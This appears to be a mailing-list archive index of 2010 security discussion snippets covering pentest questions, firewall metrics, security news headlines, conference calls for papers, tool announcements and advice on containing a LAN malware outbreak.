Having 50000 ports of the 65535 ports is highly unlikely. To me, the
result has a high number of false positives. To be really sure that the
ISA is exhibiting such a behavior, run nmap and wireshark and see to
it that the response is indeed coming from the ISA proxy and not from
any other device that is sitting in between your system and the ISA
proxy.
Hope that helps.
Cheers
TAS...
Re: Pentest - ISA server
Ravipriya Thushara (Aug 30)
I too think there is an IPS at the network boundary other than an ISA
server. That's why it drops connections in both directions (IPS
inspects both inbound and outbound traffic). I'm interested in what
have over 50000 open ports. I have no idea about it and why is it
doing so.
------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board
Prove to peers and...
Re: Pentest - ISA server
Paul Melson (Aug 30)
ISA Server is a proxy firewall, so TCP port scanning (3-way or SYN)
will result in lots of false positives like what you're seeing.
Libraries in the US are required to comply with CIPA, so the ISA
Server's primary purpose is most likely to filter adult web content.
It may also support remote access to the library's network, so rather
than trying to phone home from a compromised workstation (that is
probably turned off at close and rebooted...
Re: Pentest - ISA server
Boyd, Chad (Aug 28)
Try scanning a Checkpoint 7.0+ system with the IPS blade running, and you're likely to see similar things.
Pentest - ISA server
Kurt M. John (Aug 28)
Hey guys,
I have a question but I wanted to share this part with you first. I'm
doing a pentest for a client (scope includes several places including a
library) and it's been all types of fun actually. Yesterday I posed as a
library patron. I went through about 3 library computers that all had
bios passwords on them but I finally found one that didn't. So I
rebooted the computer that had no bios password to backtrack (installed
on a usb key) and...
Re: WAF Testing..suggestions??
Dotzero (Aug 27)
Try waffit - http://code.google.com/p/waffit/source/checkout
RE: WAF Testing..suggestions??
DucNguyen (Aug 27)
Hi False,
attacks/suspicious traffic towards the webserver from my client?
==> You can generate traffic attacks by web assessment tools, recommend:
W3af, Websecurify, not recommend Acunetix because it fixed http header, WAF
so easy detect and block.
good to be the role of my test
You can try some images: OWASP Webgoat; WebDojo ...
Search article of NSA: waf testing procedure.
-------------------------------------------
Regards,...
Info Security News — Carries news items (generally from mainstream sources) that relate to security.
Iran's Cyber Army Hacks 1,000 US, British, French Gov't Websites
InfoSec News (Aug 31)
http://english.farsnews.com/newstext.php?nn=8906081424
FARS News Agency
2010-08-30
TEHRAN (FNA)- An Iranian cyber group announced that it has hacked more
than 1,000 important governmental websites of the US, Britain and France
in protest at their support and financial aids to anti-Iran terrorist
groups.
"To commemorate the Day of Campaign against Terrorism and the martyrdom
anniversary of (former Iranian President Mohammad Ali)...
Darpa’s Star Hacker Looks to WikiLeak-Proof Pentagon
InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/darpas-star-hacker-looks-to-wikileak-proof-the-pentagon/
By Spencer Ackerman
Danger Room
Wired.com
August 31, 2010
Tomorrow's WikiLeakers may have to be sneakier than just dumping
military docs onto a Lady Gaga disc. The futurists at Darpa are working
on a project that would make it harder for troops to funnel classified
material to WikiLeaks -- or to foreign governments. And that means if
you work...
State retiree data breached
InfoSec News (Aug 31)
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached
By J.L. MILLER
The News Journal
August 31, 2010
DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's
benefits consultant, inadvertently posted personal information of about
22,000 state retirees on the Web, potentially exposing them to identity
theft for the rest of...
HP Holds Navy Network 'Hostage' for $3.3 Billion
InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/hp-holds-navy-network-hostage/
By Noah Shachtman
Danger Room
Wired.com
August 31, 2010
Someday, somehow, the U.S. Navy would like to run its networks -- maybe
even own its computers again. After 10 years and nearly $10 billion,
many sailors are tired of leasing their PCs, and relying on a private
contractor to operate most of their data systems. Troops are sick of
getting stuck with inboxes that hold...
Focus on Secrecy Could Hamper Pentagon's Cybersecurity Plans
InfoSec News (Aug 31)
http://threatpost.com/en_us/blogs/focus-secrecy-could-hamper-pentagons-cybersecurity-plans-083010
By Paul Roberts
Threatpost.com
08/30/2010
The former head of the Department of Homeland Security's Cyber Security
Division warns that the U.S. military's preoccupation with secrecy could
hamper efforts to get the upper hand in cyber security.
An article last week by the U.S Deputy Secretary of Defense put the U.S.
military's cybersecurity plans...
Obama to loosen rules on technology exports
InfoSec News (Aug 31)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/30/AR2010083004278.html
By Howard Schneider
Washington Post Staff Writer
August 30, 2010
The Obama administration is overhauling the decades-old rules for the
export of sensitive military and other technology, jettisoning what
industry groups criticize as an antiquated "Cold War" set of regulations
for a more streamlined approach.
After a year-long review by officials at...
[Dataloss Weekly Summary] Week of Sunday, August 22, 2010
InfoSec News (Aug 31)
========================================================================
Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, August 22, 2010
5 Incidents Added.
========================================================================
DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open
Security Foundation asks for contributions of new incidents and new data for...
IT Security Unleashes Employee Complaints
InfoSec News (Aug 31)
http://www.informationweek.com/news/security/client/showArticle.jhtml?articleID=227101732
By Mathew J. Schwartz
InformationWeek
August 30, 2010
For 12% of CIOs, hearing complaints from employees over IT security
measures -- specifically, limits on their access to certain types of
websites or networks while using the office network -- is a common
occurrence. Meanwhile, 29% of CIOs say such gripes are at least
"somewhat common."...
CALL FOR PARTICIPATION-3rd Summer School on Network and Information Security (NIS'10)
InfoSec News (Aug 29)
Forwarded from: Ioannis Askoxylakis <asko (at) ics.forth.gr>
**************************************************************************
SINCERE APOLOGIES IF YOU RECEIVE MULTIPLE COPIES OF THIS ANNOUNCEMENT
***************************************************************************
CALL FOR PARTICIPATION
3rd Summer School on Network and Information Security (NIS'10)
Jointly organized by ENISA and FORTH
13-17...
Pentagon considers preemptive strikes as part of cyber-defense strategy
InfoSec News (Aug 29)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/28/AR2010082803849.html
By Ellen Nakashima
Washington Post Staff Writer
August 28, 2010
The Pentagon is contemplating an aggressive approach to defending its
computer systems that includes preemptive actions such as knocking out
parts of an adversary's computer network overseas - but it is still
wrestling with how to pursue the strategy legally.
The department is developing a...
Audit finds computer misuse at state employment agency
InfoSec News (Aug 29)
http://www.charlotteobserver.com/2010/08/27/1645949/audit-finds-computer-misuse-at.html
By Michael Biesecker
newsobserver.com
Aug. 27, 2010
RALEIGH - Employees at the state agency tasked with helping unemployed
North Carolinians find jobs were instead using their government
computers to play games and burn copies of bootleg DVDs, a state audit
shows.
The Office of the State Auditor launched the investigation at the
Employment Security...
New DDoS Botnet Hits Nearly 200 Websites
InfoSec News (Aug 29)
http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=227100032
By Kelly Jackson Higgins
DarkReading
Aug 26, 2010
A new botnet built for knocking websites offline has attacked mostly
Chinese and some U.S. sites, according to researchers.
About 90 percent of the command and control servers running YoyoDdos,
the nickname given the botnet by researchers at Arbor Networks who have
been studying and tracking...
3 areas where FUD needs to stop
InfoSec News (Aug 29)
http://www.csoonline.com/article/606263/3-areas-where-fud-needs-to-stop
By Joan Goodchild
Senior Editor
CSO
August 26, 2010
There is a new breed of animal appearing in the infosec community,
according to Dr. Jimmy Blake, chief security officer for Mimecast, a
cloud-services company based in London, and host of the blog Cloud
Computing and Bad Behavior. The new breed is what he calls the
"attention monger" (he actually used a more...
Linux Advisory Watch: August 27th, 2010
InfoSec News (Aug 29)
+----------------------------------------------------------------------+
| LinuxSecurity.com Linux Advisory Watch |
| August 27th, 2010 Volume 11, Number 35 |
| |
| Editorial Team: Dave Wreski <dwreski () linuxsecurity com> |
| Benjamin D. Thomas <bthomas () linuxsecurity...
Gareth Williams: 'backroom boy' spy was really a high-flier
InfoSec News (Aug 29)
http://www.telegraph.co.uk/news/uknews/crime/7969595/Gareth-Williams-backroom-boy-spy-was-really-a-high-flier.html
By Gordon Thomas
Telegraph.co.uk
29 Aug 2010
The Government Communications Headquarters in Cheltenham is Britain's
last great secret. Now it is in the focus of intense speculation among
its stunned staff. Never before has one of their own been murdered. In
GCHQ's cafes, the seating area around the lawn at the core of the...
Firewall Wizards — Tips and tricks for firewall administrators
Online Binary Planting Exposure Test
Lists (Sep 02)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
Re: UPnP part of attack surface
ArkanoiD (Aug 31)
It was pretty obvious from the very beginning that UPnP is an evil gaping hole.
:-)
And actually I've never seen a reason to keep it enabled.
UPnP part of attack surface
travis+ml-firewalls (Aug 31)
http://it.slashdot.org/it/08/01/14/1319256.shtml
One reason I'm interested in an authenticated way to do firewall
rule changes with DFD...
Re: In search of Firewalls KPIs
pkc_mls (Aug 31)
On 8/12/2010 11:07 PM, saumitra prabhudesai wrote:
Hi,
Can you please describe a little bit more what you plan to do, which
models are involved, which scenarios, etc.?
The KPIs are the same for several firewall vendors: cpu, memory, number
of sessions, throughput, etc.
Re: a cutting-edge open-source network security project
travis+ml-firewalls (Aug 21)
Let the heresy begin! ;-)
Well, I was thinking of packet scrubbing in particular, with min-ttl
restrictions, because that can wreak havoc with traceroute. Being
able to easily turn it off for an IP for a quick traceroute is handy.
Any good Boeing 747 can already get you where you need; why would
anyone be interested in a free solar-powered engine?
Also, not all adversaries are conducting network attacks; perhaps you
want to block people who...
Re: covert timing channel data
travis+ml-firewalls (Aug 21)
This is my timing side-channel link collection:
http://www.subspacefield.org/security/security_concepts/index.html#tth_sEc31.2.4
I should probably break that section up into remote & local, but I'm
already 3 levels deep :-)
I'd definitely check out "remote timing attacks are practical", I think
that one has the most information for your case.
You might want to check out Bernstein's AES attacks, or a statistician,
to characterise...
Re: covert timing channel data
Melissa Stockman (Aug 21)
Thanks Travis but again this is not the data that I'm looking for.
The timing attacks described in your link are based on a single malicious
entity extracting data from a non compromised system by looking at timing
information.
The type of covert channel that I'm simulating has two malicious entities (a
sender and a receiver). One residing on a higher level security system and
one residing on a lower level security system. The entity on the...
Ruxcon 2010 Final Call For Papers
cfp (Aug 21)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...
In search of Firewalls KPIs
Marcin Antkiewicz (Aug 21)
Saumitra,
KPIs are metrics. Good metrics should be Specific, Measurable,
Actionable, Relevant, and Timely (SMART people call it).
A simple way of looking at firewall metrics is by placing them into
environmental, operational and strategic categories.
Environmental measurements deal with power/cooling consumption, rack
footprint, cabling/media, location, power sources, etc.
Operational stats deal with capacity
(disk/CPU/states/licenses/interface...
Re: In search of Firewalls KPIs
saumitra prabhudesai (Aug 18)
Thank you very much Tim. I'll start with the following as of now.
Thanks,
Saumitra
--- On Tue, 17/8/10, Tim Eberhard <xmin0s () gmail com> wrote:
From: Tim Eberhard <xmin0s () gmail com>
Subject: Re: [fw-wiz] In search of Firewalls KPIs
To: "Firewall Wizards Security Mailing List" <firewall-wizards () listserv icsalabs com>
Date: Tuesday, 17 August, 2010, 9:18 AM
I would suggest monitoring the following:
Number of...
Re: In search of Firewalls KPIs
Tim Eberhard (Aug 17)
I would suggest monitoring the following:
Number of total sessions
Session Ramp rate
CPU (Flow and task)
Interface stats
Policy drops/screen drops
Temperatures
Depending on the model (higher end boxes) you also might want to monitor the
'get asic d' command. Traffic types greatly impact the capacity of these
boxes.
I hope this helps.
-Tim Eberhard
In search of Firewalls KPIs
saumitra prabhudesai (Aug 16)
Hi All,
I am in search of the essential KPIs to be monitored for Juniper Netscreen Firewalls. After the identification of these
KPIs, I want to go ahead for capacity planning & performance optimization of these firewalls. Any piece of advice will
help!
Thanks,
Saumitra
Re: Intranet or intranet?
Gautier . Rich (Aug 06)
While I've always spelled it as Intranet everywhere I've written it - I am now completely convinced that I have been in
the wrong for many, many years.
It is an intranet - not The Intranet. If you want to name it - then you can capitalize it.....e.g. Behmnet
Rich Gautier
Sr. Product Architect
Kadix Systems
Office: 571-226-8828
Cell: 703-231-2156
From: firewall-wizards-bounces () listserv icsalabs com [mailto:firewall-wizards-bounces ()...
Re: Intranet or intranet?
Brian Loe (Aug 06)
Depends on context. If you are writing "the intranet" then you would
not capitalize it. If, however, you are writing "Company ABC's
Intranet" then you would. The latter being a proper noun and such.
Re: Intranet or intranet?
John Morrison (Aug 06)
Jeff,
The noun internet means a network of networks. It is a group of
connected networks - an internetwork. The I in IP stands for
internet. The capitalisation of Internet is used for THE Internet. It
is a proper noun in this case. (See -
http://www.webster-dictionary.org/definition/internet
Which says "Internet - (Note: capital "I"). The Internet is the
largest internet (with a small "i") in the world)
Following...
IDS Focus — Technical discussion about Intrusion Detection Systems. You can also read the archives of a previous IDS list
CFP: Deadline Extended: SLAML'10
Mohror, Kathryn (Jun 18)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)
=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================
********...
Announcement: xtractr updates
pcapr (Jun 08)
Just a quick note to let you know that the lite version of xtractr can
now index up to 10 million packets or 1GByte of pcaps. This makes it
easy to grab large packet traces from a production network and perform
troubleshooting and forensics with just a few clicks. We have also
updated the live demo of xtractr to use the pcap from the Honeynet
Challenge #4 (VoIP). Can you answer the forensics questions?
http://www.pcapr.net/xtractr
If you are...
Performance measurement tool for IDS/IPS
wittybugz (Jun 01)
Hi All,
Is any tool available in market (free or paid) for measuring performance of Host based IDS/IPS devices?
I want to measure performance for protocols like HTTP, FTP, SMB/RPC, DNS etc.
Thanks,
Prateek
-----------------------------------------------------------------
Securing Your Online Data Transfer with SSL.
A guide to understanding SSL certificates, how they operate and their application. By making use of an SSL certificate
on your web...
Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Online Binary Planting Exposure Test
ACROS Security Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
Released SpyBHORemover 2.5
Nagareshwar Talekar (Aug 25)
Hi all,
SpyBHORemover 2.5 is released to public now. SpyBHORemover (previously
called BHORemover) is the [FREEWARE] advanced tool to explore and
eliminate malicious BHO's from the system.
http://securityxploded.com/bhoremover.php
More about SpyBHORemover:
--------------------------------------------
BHO stands for 'Browser Helper Objects' which are plugins written for
'Internet Explorer' to enhance its capabilities. Often this...
t2'10 Challenge to be released 2010-08-28 10:00 EEST
Tomi Tuominen (Aug 24)
Hi,
Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!
Now is your chance to join the past elites (http://t2.fi/challenge/) by...
[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN!
Leonardo Buonsanti (Aug 20)
Greetings everyone!
We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations are officially open!
Early bird offers are available! Hurry up!
This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!
Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration
All info about the event can be found at:...
Better Security Through Sacrificing Maidens
Pete Herzog (Aug 19)
Hi,
I thought that this might be an interesting read for web developers.
It outlines a major problem with modern security practice and suggests
how to address it.
https://www.infosecisland.com/blogview/6646-Better-Security-Through-Sacrificing-Maidens.html
Sincerely,
-pete.
Ruxcon 2010 Final Call For Papers
cfp (Aug 19)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...
Re: winAUTOPWN v2.3 Released
Brad Causey (Aug 11)
The comments are from folks that don't know what they are doing. My
understanding is that this tool isn't for newcomers to the security
realm, nor is the tool for script kiddies.
As with any open source security tool, use it with caution, and never
use anything you don't fully understand.
-Brad Causey
CISSP, MCSE, C|EH, CIFI, CGSP
http://www.owasp.org
Re: winAUTOPWN v2.3 Released
ghost (Aug 11)
Damning how? It's obviously a script kiddie tool, so that leaves...
The genius that doesn't realize his AV is going off on the included
exploits and thinks its infected?
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------
Re: winAUTOPWN v2.3 Released
Jamie Riden (Aug 11)
Well, metasploit is "full of viruses" by that criterion as well - if
your AV tool doesn't moan about something like this then you need a
new AV tool :)
Having said that, I haven't downloaded it and tried it myself, but do
it on an isolated VM if you're worried.
cheers,
Jamie
Re: winAUTOPWN v2.3 Released
Fred Concklin (Aug 09)
Comments prove to be damning.
http://www.darknet.org.uk/2009/04/winautopwn-windows-autohacking-tool/
"QUAKER DOOMER" <quakerdoomer () inbox lv> wrote:
winAUTOPWN v2.3 Released
QUAKER DOOMER (Aug 08)
Dear all,
This is to announce release of winAUTOPWN version 2.3
This version covers remote exploits up-till July 2010.
A few web RFI exploits will be added in the next Unpolished Sita Release.
A complete list of all Exploits in winAUTOPWN is available in CHANGELOG.TXT
Also, in this version :
BSDAUTOPWN has been upgraded to version 1.1. This BSD equivalent for winAUTOPWN now contains
almost all exploits which exist in winAUTOPWN except for...
2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers
Carlos Serrão (Aug 02)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to develop new and flexible...
[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th
Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!
This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!
HITB CFP: http://cfp.hackinthebox.org/
===
Venue: Crowne Plaza Mutiara Kuala Lumpur...
Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 02)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
(http://www.null.co.in)
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
-...
Re: SELinux, was Re: X11 -> Root? (Qubes square rooted)
travis+ml-dailydave (Sep 02)
Forgot a few, or rather neglected to mention them, because I have no
good response, and am acknowledging the argument by omitting a
response. I'm responding here in the interest of fairness:
Pro: MAC policies are complex because what you're trying to do is complex.
Anti: So you're saying MAC is complex because MAC is complex?
Pro: I guess so. ;-)
I don't have a good way to defend this, but it seems to me that, in
general, the more fine-grained...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
travis+ml-dailydave (Sep 02)
Summary:
Government: We need cyber-security, put out a contract for bids.
CompanyA: We can do it for $120k/seat.
CompanyB: We can do it for $100k/seat.
CompanyC: We can do it for $140k/seat.
Government: SELECT * FROM CONTRACTOR ORDER BY COST_PER_SEAT;
CompanyB: Find us the people who are arguably qualified, and
will work for a maximum of $50k, fill out an EPSQ,
submit to a SSBI, and whose poo doesn't stink.
Nobody...
SELinux, was Re: X11 -> Root? (Qubes square rooted)
travis+ml-dailydave (Sep 02)
Okay, I'll feed him... ;-)
I'm the one who came forward a few years ago - not as saying SELinux
is a silver bullet - but rather that it's not entirely worthless (as
many curmudgeons would have you believe).
That you can defeat a kernel-level protection with a kernel-level
exploit isn't news. Saltzer & Schroeder pointed out that a
"supervisor program" must protect itself long ago. To reliably
enforce a protection mechanism, you...
Rooted CON 2011 - Call for Papers
Román Ramírez (Sep 02)
Rooted CON 2011 - Call for Papers
-=] About Rooted CON
Rooted CON is a security congress which will be held in Madrid (Spain)
from 3 to 5 March 2011, whose spectrum of participants ranging from
students to state forces and secret services, through professionals of
the security market, lawyers, or even technology enthusiasts (and others).
-=] Type of Presentations
The congress accepts two kinds of presentations:
- Fast talks: 20 minutes.
-...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
Indeed. How about car analogies, though?
/mz
SILICAU Lightning Demo (Wireless key cracking)
Mark Wuergler (Sep 01)
List,
Today's lightning demo will take a look at the wireless key cracking
capabilities of SILICAU.
Come watch us crack WEP, WPA1/2, and LEAP authentication!
Immunity will be doing a Lightning Demo today, Wednesday September 1st at
3:00p EDT (UTC - 4), we expect the demo to last between 15 and 20
minutes. Space is limited to 20 and invites will be issued on a first
come / first served basis. Invites for the demo will be sent at
approximately...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Fyodor (Sep 01)
In China they've been pushing Multi-Level Protection Scheme (MLPS),
which somewhat makes sense, when it is not at personal but at
enterprise level (i.e. you don't want your enemy country enterprises
to come and secure your critical infrastructure and plant backdoors as
they go :))
The comparison with medical industry is ridiculous. Not only the med.
industry doesn't serve its main purpose (healing), but there is also
one key difference: the...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
If you look at the archives of attrition.org, I actually suspect that
the charlatan fraction is about as strong as always, and not
particularly threatening to the legitimate business; and, given that,
as that report sensibly acknowledges, even fairly reputable
certifications do very little to generate highly qualified security
personnel, I doubt any action along these lines would make much of a
difference.
The real problem seems to be that the...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
Yeah, I remember that one.
Between this and the continued push for "private-public partnerships"
(i.e., companies letting the government assess their
cyber-preparedness, etc), I am getting vaguely uncomfortable with the
attention the industry is getting of recent - despite the fact that
little or nothing has changed in the last 5-6 years, too.
It's not as much that I suspect the government has questionable
motives, of course; this is...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
dan (Sep 01)
<disclaimer>I serve on that CSIS Commission</disclaimer>
Certification is coming, like it or not. I do not like it,
but it is coming. The driver is a direct consequence of,
and a direct confirmation that, the demand for security
expertise exceeds the supply which makes the charlatan
fraction rise especially as legal liability looks ever
more likely to be serious. Before we have a long-winded
argument, take a look at
www.nbise.org...
Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Aug 31)
This is probably somewhat interesting; a prominent quote from this
paper, dissing security certifications, is making rounds for a while -
but the rest of the paper is actually pretty scary:
http://csis.org/files/publication/100720_Lewis_HumanCapital_WEB_BlkWhteVersion.pdf
In essence, looks like the commission is simultaneously trying to
criticize the current regime of security certifications (probably
rightly so), and - very bizarrely - use...
SILICAU Movie
dave (Aug 26)
You can watch Mark Hijack a twitter/facebook session here.
http://partners.immunityinc.com/movies/Lightning_Demo_SilicaU_01.mp4
The key thing isn't really that this is possible (I assume if you're on this list you
know it is possible). The key thing is that it's two clicks.
-dave
Ekoparty classes!
dave (Aug 25)
Immunity will be doing two classes at Ekoparty this September. You should sign up,
especially if you're going to go to Ekoparty (which you should)!
Breaking Windows
September 14th and 15th
Python for Hackers
September 13th and 14th
Realistically, both classes should be titled: "Things you should know that we had to
learn the hard way". That's what almost all classes at conferences should be titled,
except, in Ekoparty's case, in...
t2’10 Challenge to be released 2010-08-28 10:00 EEST
Tomi Tuominen (Aug 25)
Hi,
Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!
Now is your chance to join the past elites (http://t2.fi/challenge/) by...
PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.
Re: LAN Virus outbreak Procedures
d4ncingd4n (Sep 02)
If you know the name of the executable files, you may be able to use a software restriction policy in active directory
to kill or limit the virus.
Try to determine the infection mechanism. Don't forget to check any backup media, usb keys, etc to prevent
reinfection.
If you can isolate infected hosts as Russell mentioned, it will make it easier.
As far as prevention, make sure the users are running with least user privileges, remove...
Re: LAN Virus outbreak Procedures
Tyler Robinson (Sep 02)
Thanks that is awesome advice I am starting there and running ossim and
trying to analyze ya I could use 2 more people for sure but thanks everyone
again the advice given is invaluable keep any ideas coming I will be trying
a lot of things and hopefully can post what works and my experience to help
others.
TR
Re: LAN Virus outbreak Procedures
Chris Keladis (Sep 02)
Hey Tyler,
Ouch! Sounds like you need more hands and eyes on the problem :)
The only thing I can think of, bar running around to 350 PCs is maybe
sample a few to understand what malware you've got going on.
Make use of Microsoft's (ex-Sysinternals) tools to investigate.
AutoRuns, ProcExp, etc etc.
One handy tip when using ProcExp, don't "kill" malicious processes,
rather, "pause" or "freeze" them. Most malware...
Re: LAN Virus outbreak Procedures
Tyler Robinson (Sep 02)
- I am working with several the most prominent being win32/afcore.nba
Trojan
- They seem to replicate to multiple machines at once from unknown origin
- about 60% conservatively so over a 100
- I have been back pedalling so hard I have not had time to packet
capture or even analyze
- Eset Nod32 v 4 Is our AV and it is catching and cleaning but it is
cleaning 10 or so every min which is hitting network performance a great...
OhioLinuxfest Sept 10-12, 2010
Dave (Sep 02)
Hi,
Just a reminder that http://www.ohiolinux.org/ is coming up in a Week!
Greater Columbus Convention Center
400 North High Street
Columbus, OH 43215
See ya there!
Dave
Re: LAN Virus outbreak Procedures
Tyler Robinson (Sep 02)
Thanks everyone for all the ideas the environment has about 350 machines at
least all on flat domain can't vlan due to stupid software configurations. I
have several systems that have to be live all the time (911 systems) and
vmware esx servers in cluster. Any other suggestions is again so much
appreciated I am willing to try just about anything right now I have a lot
of angry users right now due to network performance ( for their facebooking I
am...
Re: LAN Virus outbreak Procedures
Bill Swearingen (Sep 02)
forgot to add you need to identify the propagation method, and its potential
to infect other hosts. If it does do some sort of worm like activity, that
needs to be your first thing that you mitigate.
On Thu, Sep 2, 2010 at 2:17 PM, Bill Swearingen <hevnsnt () i-hacked com> wrote:
Re: LAN Virus outbreak Procedures
Bill Swearingen (Sep 02)
Sounds like you need to take a quick step back and assess your position:
- What malware are you working with? (any details online?)
- What are its specific characteristics?
- How many potential machines?
- Does it phone home in any way?
- What tools/systems do you have in place that can *detect* an infected
system?
- What tools do you have that can clean an infected system?
Then design your incident response from there....
Re: LAN Virus outbreak Procedures
Arch Angel (Sep 02)
Tyler,
I would not go crazy and start hardening PC's. I would get a system with a
few nic's and install something like OSSIM or even get a trial of Astaro
setup and then begin to trace it down. Begin by what systems are causing
the problems and then fix them one by one hardening them as you do them so
they don't get reinfected.
Just my thoughts others may have better ones :-)
Robert
(arch3angel)
Re: LAN Virus outbreak Procedures
Craig Freyman (Sep 02)
How big is the environment?
On Thu, Sep 2, 2010 at 9:27 AM, Tyler Robinson <pcimpressions () gmail com> wrote:
Re: LAN Virus outbreak Procedures
Pat (Sep 02)
I used a notable pen drive. Boot Linux install f-prot for Linux. Mount and
scan the drives. This works great on root kits
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
Microsoft's firewall with GP and just open exceptions for the applications
that need it or run another piece of...
Re: LAN Virus outbreak Procedures
Butturini, Russell (Sep 02)
I've had much success with VLANing the affected systems off from the rest of the network and deploying some kind of
local "cleanup" machine that's hardened to work on the remediation process.
From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Tyler
Robinson
Sent: Thursday, September 02, 2010 10:28 AM
To: PaulDotCom Security Weekly Mailing List
Subject: [Pauldotcom] LAN...
LAN Virus outbreak Procedures
Tyler Robinson (Sep 02)
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
Microsoft's firewall with GP and just open exceptions for the applications
